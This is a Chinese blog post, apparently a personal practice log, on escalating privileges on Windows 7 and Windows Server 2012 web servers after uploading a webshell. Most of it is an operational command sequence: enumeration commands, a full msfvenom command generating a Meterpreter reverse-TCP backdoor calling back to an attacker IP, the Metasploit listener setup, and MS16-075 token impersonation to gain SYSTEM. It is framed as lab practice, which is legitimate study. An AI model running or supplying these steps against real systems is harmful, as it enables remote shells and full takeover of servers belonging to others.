• 2019-12-10:win7,win12提权练习


    一、win7

    1,上传webshell到服务器,访问

     

    2,因为win7权限没设置好,导致任何命令都可以执行

     

    直接提权成功,还可以通过msf工具利用exp进行提权,今天太晚了就先不做了

    二、win2012

    1,将写好的大马放到web服务器上

     

    2,测试机进行访问大马,执行whoami执行成功,是iis服务账户

     

    3,执行systeminfo获取服务器系统补丁信息

     

    4,尝试net user 可以查看到用户,使用net user /add没有成功

     

    6,上传使用测试脚本可读写目录脚本,测试出可读写的目录

     

    7,使用msfvenom生成的后门监听端口

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.158 lport=1234 -f exe -o ./hack.exe 生成后门程序,进行上传

     

    执行监听

    1)use exploit/multi/handler

    2)set PAYLOAD windows/meterpreter/reverse_tcp

    3)set LHOST 192.168.190.158 set

    4)LPORT 1234

    5)exploit

     

    在提权目标服务器上执行hack.exe程序

     

    8,成功接收到session

     

    9,利用msf16-075进行提权,依次执行以下命令

    use incognito

    list_tokens -u

    execute -cH -f ./potato.exe

     

    10,提升权限,

    执行ms16-075提权程序后,再次执行以下命令,获取当前用户权限为NT AUTHORITYSYSTEM权限。

    list_tokens -u

    impersonate_token "NT AUTHORITYSYSTEM"

    getuid

    提权成功

     完

  • 相关阅读:
    SQL语句编写
    触发器
    plot函数中的type中的参数
    【转】R中read.table详解
    7月18日R笔记
    RMySQL在windows下的安装方法
    WinXP下面实现JAVA对R调用 (rJava包设置)
    用R进行文档层次聚类完整实例(tm包)
    R学习之R层次聚类方法(tm包)
    R对term进行层次聚类完整实例(tm包)
  • 原文地址:https://www.cnblogs.com/sym945/p/12019689.html
Copyright © 2020-2023  润新知